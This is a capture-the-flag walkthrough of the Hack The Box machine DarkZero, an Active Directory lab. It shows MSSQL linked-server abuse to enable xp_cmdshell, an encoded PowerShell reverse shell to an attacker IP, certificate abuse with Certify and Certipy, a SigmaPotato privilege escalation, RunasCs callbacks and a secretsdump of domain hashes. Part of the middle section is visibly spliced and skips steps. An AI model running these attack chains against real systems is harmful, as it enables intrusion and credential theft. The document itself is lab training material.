DarkZero
Box Creds
We start with creds for the box: john.w / RFulUtONCOL!
Recon
Port Scanning
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ sudo nmap -PN 10.129.100.231
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-07 11:39 PKT
Nmap scan report for 10.129.100.231
Host is up (0.21s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 19.89 seconds
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ sudo nmap -p53,88,135,139,389,445,464,593,636,1433,2179,3268,3269,5985 -sCV 10.129.100.231
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-07 11:46 PKT
Nmap scan report for 10.129.100.231
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-07 13:47:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.129.100.231:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.100.231:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-10-07T13:48:32+00:00; +7h00m10s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-07T09:53:46
|_Not valid after: 2055-10-07T09:53:46
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-07T13:47:53
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m10s, deviation: 0s, median: 7h00m09s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.23 seconds
We have an Active Directory box. The interesting discovered service is MSSQL. We will need to fix the clock skew with ntpdate for anything kerberos related.
Let’s start by generating a host file (picked this from 0xdf):
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ netexec smb 10.129.100.231 --generate-hosts-file darkzero
SMB 10.129.100.231 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ cat darkzero
10.129.100.231 DC01.darkzero.htb darkzero.htb DC01
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ cat darkzero | sudo tee -a /etc/hosts
10.129.100.231 DC01.darkzero.htb darkzero.htb DC01
Interacting with MSSQL
We will start by enumerating and interacting with MSSQL. Netexec has a module on MSSQL we will use that.
Let’s try authenticating with the provided creds:
1
2
3
4
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ nxc mssql 10.129.100.231 -u 'john.w' -p 'RFulUtONCOL!'
MSSQL 10.129.100.231 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.100.231 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
The creds can indeed be used to interact with MSSQL. Now let’s test for command execution:
1
2
3
4
5
6
7
8
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ nxc mssql 10.129.100.231 -u 'john.w' -p 'RFulUtONCOL!' -q 'SELECT name from master.dbo.sysdatabases;'
MSSQL 10.129.100.231 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.100.231 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
MSSQL 10.129.100.231 1433 DC01 name:master
MSSQL 10.129.100.231 1433 DC01 name:tempdb
MSSQL 10.129.100.231 1433 DC01 name:model
MSSQL 10.129.100.231 1433 DC01 name:msdb
It works. On further enumeration I confirmed that bulkadmin:0 (perms to write files), xp_cmdshell wasn’t enabled on this server, and there was another linked server DC02.darkzero.ext:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ nxc mssql 10.129.100.231 -u 'john.w' -p 'RFulUtONCOL!' -q "EXEC sp_linkedservers;"
MSSQL 10.129.100.231 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.100.231 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
MSSQL 10.129.100.231 1433 DC01 SRV_NAME:DC01
MSSQL 10.129.100.231 1433 DC01 SRV_PROVIDERNAME:SQLNCLI
MSSQL 10.129.100.231 1433 DC01 SRV_PRODUCT:SQL Server
MSSQL 10.129.100.231 1433 DC01 SRV_DATASOURCE:DC01
MSSQL 10.129.100.231 1433 DC01 SRV_PROVIDERSTRING:NULL
MSSQL 10.129.100.231 1433 DC01 SRV_LOCATION:NULL
MSSQL 10.129.100.231 1433 DC01 SRV_CAT:NULL
MSSQL 10.129.100.231 1433 DC01 SRV_NAME:DC02.darkzero.ext
MSSQL 10.129.100.231 1433 DC01 SRV_PROVIDERNAME:SQLNCLI
MSSQL 10.129.100.231 1433 DC01 SRV_PRODUCT:SQL Server
MSSQL 10.129.100.231 1433 DC01 SRV_DATASOURCE:DC02.darkzero.ext
MSSQL 10.129.100.231 1433 DC01 SRV_PROVIDERSTRING:NULL
MSSQL 10.129.100.231 1433 DC01 SRV_LOCATION:NULL
MSSQL 10.129.100.231 1433 DC01 SRV_CAT:NULL
Let’s try interacting with the linked server but nxc will not suffice for that. We will use impacket-mssqlclient:
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ impacket-mssqlclient darkzero.htb/john.w:'RFulUtONCOL!'@10.129.100.231 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)>
Let’s check the readable options on linked server using sp_helpserver:
1
2
3
4
SQL (darkzero\john.w guest@master)> EXEC sp_helpserver 'DC02.darkzero.ext';
name network_name status id collation_name connect_timeout query_timeout
----------------- ------------------------------ ----------------------------------- ---- -------------- --------------- -------------
DC02.darkzero.ext b'DC02.darkzero.ext ' b'rpc,rpc out,use remote collation' b'1 ' NULL 0 120
sp_helpserver shows rpc and rpc out are enabled for DC02.darkzero.ext (that means remote procedure calls are allowed) (EXEC (…) AT [DC02]). Let’s confirm if we can do RPCs:
1
2
3
4
5
6
7
SQL (darkzero\john.w guest@master)> EXEC ('SELECT SUSER_SNAME() AS remote_suser, SYSTEM_USER AS remote_system_user, ORIGINAL_LOGIN() AS remote_original_login') AT [DC02.darkzero.ext];
remote_suser remote_system_user remote_original_login
------------ ------------------ ---------------------
dc01_sql_svc dc01_sql_svc dc01_sql_svc
SQL (darkzero\john.w guest@master)> EXEC ('EXEC master..xp_cmdshell ''whoami''') AT [DC02.darkzero.ext];
ERROR(DC02): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
Foothold
We will need to enable xp_cmdshell on the linked server first.
1
2
3
4
5
6
7
8
9
10
SQL (darkzero\john.w guest@master)> EXECUTE('EXECUTE sp_configure ''show advanced options'', 1; RECONFIGURE; EXECUTE sp_configure ''xp_cmdshell'', 1; RECONFIGURE') AT [DC02.darkzero.ext];
INFO(DC02): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC02): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (darkzero\john.w guest@master)> EXECUTE('xp_cmdshell whoami') AT [DC02.darkzero.ext];
output
--------------------
darkzero-ext\svc_sql
NULL
Since we can finally use xp_cmdshell for command execution, we can leverage it to spawn a reverse shell.
Grab a reverse shell from https://www.revshells.com and:
1
2
3
4
5
6
7
8
9
SQL (darkzero\john.w guest@master)> EXECUTE('xp_cmdshell ''powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AOAAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='';') AT [DC02.darkzero.ext];
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.129.100.231] 59540
whoami
darkzero-ext\svc_sql
PS C:\Windows\system32>
Shell as svc_sql
Let’s transfer winpeas for further enumeration.
1
2
3
4
5
6
7
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.100.231 - - [07/Oct/2025 19:55:46] "GET /winPEASany_ofs.exe HTTP/1.1" 200 -
PS C:\Users\svc_sql> curl.exe -o peas.exe http://10.10.16.8/winPEASany_ofs.exe
An interesting file was found at C:\ drive:
1
2
3
4
5
6
7
8
9
10
11
12
PS C:\> dir
Directory: C:\
<SNIP>
-a---- 7/30/2025 6:38 AM 18594 Policy_Backup.inf
PS C:\> Get-Content C:\Policy_Backup.inf -Raw | Out-String -Width 200 | more
<SNIP>
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeCreateGlobalPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
<SNIP>
Policy_Backup.inf and SeImpersonatePrivilege
With Policy_Backup.inf we know the the security controls. (Policy_Backup.inf is a configuration file that holds the exported security settings of a Windows machine’s local policy or a Group Policy Object)
The presence of SeImpersonatePrivilege allows running a process in the security context of a different user. We can’t just exploit it yet since our user doesn’t have the privilege, and the user token overrides group membership (S-1-5-6).
Changing the password of svc_sql
Domain and DC can be found with systeminfo command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
PS C:\mk> .\cert.exe request /ca:DC02\darkzero-ext-DC02-CA /template:User
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : darkzero-ext\svc_sql
[*] No subject name specified, using current context as subject.
[*] Template : User
[*] Subject : CN=svc_sql, CN=Users, DC=darkzero, DC=ext
[*] Certificate Authority : DC02\darkzero-ext-DC02-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 3
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAx6Y0SJQzLIWcNLhIGXS2MOteKhHWCd/DskiXTj1L3ghr7BUw
oczHMYn4CHNCXgZnz4Ota+xP8bwqhXt69zGNmoLFdFgI++0VZxB9+N59xFFArVEp
oh3RrATZkAhNrK2OykWhE5nAgboHK4YDKjKKrHFYjH2dQ7F/2fbTEYNsnoxK/Fc4
yo903skgyDEu5OL7noD9wlkf9EflljQedYxQdohm8X9KQM1rGAWM18iVK9r59xNQ
9TnzrmpySYWHdpkFIwGP7NNvUcXE7HDGMB7+lU02sLKV0BHdOkfXPYJaxYiAvU+r
nqHRWxpPOslv+qhg6MOrkw/WxQ2TF1HVi/xp5QIDAQABAoIBAGh2c3bibGBITLJd
FgSTx9yS2sNib77c4TWAvAKJGhBEEcwGTlrqnfMywKATRs+RxHGU8YG9tRrEHO+Y
638542DMOeqlQZYnuAIkY/V63Q2Cgjftdr5HofTC2N9/KL1IVqVJh32M/mgiYSwJ
w9Apf9u4tt9Tvpyz3DS87DWGsafGzXbm1pwyKwB/FfdnytWP1XI35NePPEY+RHGF
nxXzS3rsSCUIkl6UeLg8Ray5tJ0x+WjUAtcKVGyt06Yu86twZ6GKV5nsgI8wdA1U
OFyoJISr9v4JUlImUNFQvGZLoZD0wsX0eeH58cNAUFt+r+oJzOIv98yXbGzmEwsJ
Dsm2XMUCgYEA7clcHZGXNWm/wrf33LlOO6a8qgNuN0iMPBhA06ff1L52Lov1MeNo
eRH7uRZFAV7C8SkEtWLtGWTstkRsitodoYFnvWYnHv8LPA5bh98jomoCofhpRcoe
ZyqKYiSWl9evZxOYRYYzVjJyVgpbSEnLQgWn4dXLV/U7rlU5U2t95/MCgYEA1vEH
O+YaqZT9BBmpgOTuDWRusny8OIS213lC88I57d9i6DbzAzTXw0bW0OOg6CW0haMk
YxgvfMJPqYzWrdyxPMf3Yvlupwerlj1oepBgEYuSCxm9Jv8o/To29+DFxyZy+0IO
THKw4Z8eTgOISALaKE0etvHHQPUkzG9JmGuxdMcCgYEAqmyGK98cK7kWKj3mVPku
/Avd7lA1H0RM1glf9RK9luHHHEdNPitJxnRAIQC4Bmpfd665ZDN50ZiHG39g+Aep
8wYnTxS29z0+VRXJPlGMXaxzJJlBAjcBoVlZA0xL7po0acEegr3Tb3UKg2Y61E2n
czNQhsjPS8REuQb15jcFb0cCgYB1x832/LhPhNzAim9fuhLYM9iU5dUeA1tN55zQ
hfXIa0h/htzTPPmegArmnFVn4IFzWVpvEqmy66dLeWmKDAzzCYB+M8B2trVHto6x
2rtJ4fk9K/WCkP+dA3FrkzfNUTxggmnjalWSzOaGSVk8XJO+0cOq7AILjkmD3Nev
NhQfsQKBgBWs0fzzvBKGth935Y2e4f7fJ1xwaO7i8hlfkv65mVa9n/E/YFJFU6Wu
GHQeZHy/gNScE27S/d9GagwqijS0pHHOg+SyNxtCA92zz31Uph0NMzvhAgqEyy0V
7Ur9RGFN2vIU18BPB8c6wsJqNjOIVM4rTs42LJHURdmzKukc79fr
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIHKTCCBRGgAwIBAgITaQAAAAPPIwjQlu45xQAAAAAAAzANBgkqhkiG9w0BAQsF
ADBOMRMwEQYKCZImiZPyLGQBGRYDZXh0MRgwFgYKCZImiZPyLGQBGRYIZGFya3pl
cm8xHTAbBgNVBAMTFGRhcmt6ZXJvLWV4dC1EQzAyLUNBMB4XDTI1MTAwODIwMDE0
OFoXDTI2MTAwODIwMDE0OFowUTETMBEGCgmSJomT8ixkARkWA2V4dDEYMBYGCgmS
JomT8ixkARkWCGRhcmt6ZXJvMQ4wDAYDVQQDEwVVc2VyczEQMA4GA1UEAwwHc3Zj
X3NxbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMemNEiUMyyFnDS4
SBl0tjDrXioR1gnfw7JIl049S94Ia+wVMKHMxzGJ+AhzQl4GZ8+DrWvsT/G8KoV7
evcxjZqCxXRYCPvtFWcQffjefcRRQK1RKaId0awE2ZAITaytjspFoROZwIG6ByuG
AyoyiqxxWIx9nUOxf9n20xGDbJ6MSvxXOMqPdN7JIMgxLuTi+56A/cJZH/RH5ZY0
HnWMUHaIZvF/SkDNaxgFjNfIlSva+fcTUPU5865qckmFh3aZBSMBj+zTb1HFxOxw
xjAe/pVNNrCyldAR3TpH1z2CWsWIgL1Pq56h0VsaTzrJb/qoYOjDq5MP1sUNkxdR
1Yv8aeUCAwEAAaOCAvswggL3MBcGCSsGAQQBgjcUAgQKHggAVQBzAGUAcjApBgNV
HSUEIjAgBgorBgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQH/
BAQDAgWgMEQGCSqGSIb3DQEJDwQ3MDUwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
DQMEAgIAgDAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUv+mY0xvFTRM0
wtbRBNeDivid29AwHwYDVR0jBBgwFoAU1Rl+LJBmS8zfG6d+AhLydWFBqowwgdAG
A1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6Ly8vQ049ZGFya3plcm8tZXh0LURD
MDItQ0EsQ049REMwMixDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMs
Q049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1kYXJremVybyxEQz1leHQ/
Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERp
c3RyaWJ1dGlvblBvaW50MIHHBggrBgEFBQcBAQSBujCBtzCBtAYIKwYBBQUHMAKG
gadsZGFwOi8vL0NOPWRhcmt6ZXJvLWV4dC1EQzAyLUNBLENOPUFJQSxDTj1QdWJs
aWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9u
LERDPWRhcmt6ZXJvLERDPWV4dD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xh
c3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAvBgNVHREEKDAmoCQGCisGAQQBgjcU
AgOgFgwUc3ZjX3NxbEBkYXJremVyby5leHQwTQYJKwYBBAGCNxkCBEAwPqA8Bgor
BgEEAYI3GQIBoC4ELFMtMS01LTIxLTE5Njk3MTU1MjUtMzE2Mzg1MTItMjU1Mjg0
NTE1Ny0xMTAzMA0GCSqGSIb3DQEBCwUAA4ICAQCAL2srObt2xLLw++hK2XWOarAW
H+Vy56u+MtwsAPsKrovEdmbHHe7q6xqsH7V+MXsNLj1knhru3JMzK5Tv2eSF+Rjj
A2yrg2HZxiDkoqBI9nJw1ZM7+UZ6uC8MSi/zBQ6B/o6LEfxDHzqyEErXK0rvFT7A
fhbQ6WGpTXv2kItreuIQY/yjE6awm33Uu92QbS17Ss/VcrbjswJboedYwDyaNSQ4
qNcX+4E1eeic5Wc3nXKRLjQdFbkUgz0i0BxzL7wBW451JlMK72uXMIt7a20/6qnx
Ri/HXKWPyyc1oNVJ5Zigcg8AhVwF6QgKkXZ1fizsdR9AzJ7w1fBfe/ZnPbL4M++J
FsB1wJOvlBMtKAuOnQEGgbvouQyepP3Rs5eUPCI++tseB66QFd20JmQR79q4KYeL
ZKfa7pH6Ht+lfN9Nhhwodtti7lV+JRKM7WrFBs0i5gb7RCF10HT8NHSfrQmknejV
IHRD5eTVpkVtXrj6BXL6ceoKUrrPs6qkiVGvejKFoGP1KWnrdnop+CeG1fCOXrux
YDVlMZ5D39yEjMZaYoXRuL1niQe3Xh0Obb0yeqQtOugdnNRzAvErZXLxPLeP1MmV
7C5RZWAlVvtsv4uTs/6UuJvTB05uKnT2Fi3ddxq63weE+RmWWVJand4bZUVoBN82
8iP6oKtlqyQBHlU81g==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:13.0363572
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ certipy-ad auth -pfx cert.pfx -dc-ip 172.16.20.2
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'svc_sql@darkzero.ext'
[*] Security Extension SID: 'S-1-5-21-1969715525-31638512-2552845157-1103'
[*] Using principal: 'svc_sql@darkzero.ext'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'svc_sql.ccache'
[*] Wrote credential cache to 'svc_sql.ccache'
[*] Trying to retrieve NT hash for 'svc_sql'
[*] Got hash for 'svc_sql@darkzero.ext': aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f
PS C:\mk> .\sigma.exe "net user administrator b0tn3tbuddi3s@!!!!"
.\sigma.exe "net user administrator b0tn3tbuddi3s@!!!!"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 1008 | Token: 0x728 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 1016
[+] Current Command Length: 41 characters
[+] Creating Process via 'CreateProcessWithTokenW'
[+] Process Started with PID: 2008
[+] Process Output:
The command completed successfully.
PS C:\mk> .\runascs.exe administrator b0tn3tbuddi3s@!!!! "powershell" -r 10.10.16.8:9002
.\runascs.exe administrator b0tn3tbuddi3s@!!!! "powershell" -r 10.10.16.8:9002
[+] Running in session 0 with process function CreateProcessWithTokenW()
[+] Using Station\Desktop: Service-0x0-29a2f$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 396 created in background.
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
┌──(kali㉿vm-kali)-[~/htb/DarkZero]
└─$ impacket-secretsdump DC01.darkzero.HTB -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::
john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
